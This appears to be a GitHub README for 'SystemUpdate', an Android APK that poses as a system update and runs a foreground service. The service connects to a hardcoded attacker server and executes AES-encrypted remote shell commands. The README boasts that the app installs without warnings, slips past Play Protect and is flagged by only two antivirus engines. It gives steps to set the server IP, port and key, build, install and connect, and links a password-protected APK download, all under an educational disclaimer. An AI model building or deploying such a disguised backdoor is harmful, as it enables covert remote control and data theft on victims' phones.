⚠️ DISCLAIMER: This project is intended for educational and ethical testing purposes only.
It demonstrates how Android foreground services and socket communication work.
It is not stealth malware, and must not be used for illegal or harmful activities.
📲 This demo shows the APK being installed silently on an Android 15 device
— no popups, security prompts, or warnings — even with the August 3, 2025 security patch.
It appears as a normal system update app.
-
Only 2 engines flagged the APK:
Google→ Android:Agent-GENIKARUS→ Trojan.AndroidOS.Agent
-
✅ Google Play Protect DID NOT block installation or execution.
⚠️ Low detection is due to simplicity and unfamiliar signature — not because it’s stealthy or advanced.
SystemUpdate runs as a foreground Android service:
- Shows a persistent notification: “Updating system…”
- Connects to a hardcoded IP/Port
- Uses AES encryption to receive commands and send output
- Executes remote shell commands from server
- Clone this repo
- Open
PayloadService.ktand edit:SERVER_IPSERVER_PORTSECRET_KEY
- Build the APK with Android Studio
- Install on a test device (Android 13–15+)
- Start your TCP server and connect
🔐 Encrypted demo ZIP (APK + media) hosted on Mega:
📦 Download from MEGA
Password: 1234
Contents:
SystemUpdate.apk- Demo video (
1.mp4) - VirusTotal results (
1.jpeg,2.jpeg) - Install GIF (
1.gif)
This code is licensed under the GNU General Public License v3.
You're free to use, modify, and redistribute, but any derivative must remain open-source under the same license.
See LICENSE for details.
This project is a simple educational sandbox for:
- Android services
- Encrypted socket communication
- Remote shell execution testing
It is not obfuscated, does not attempt to bypass advanced security, and should only be used in controlled, ethical environments.
💡 Be curious, not malicious.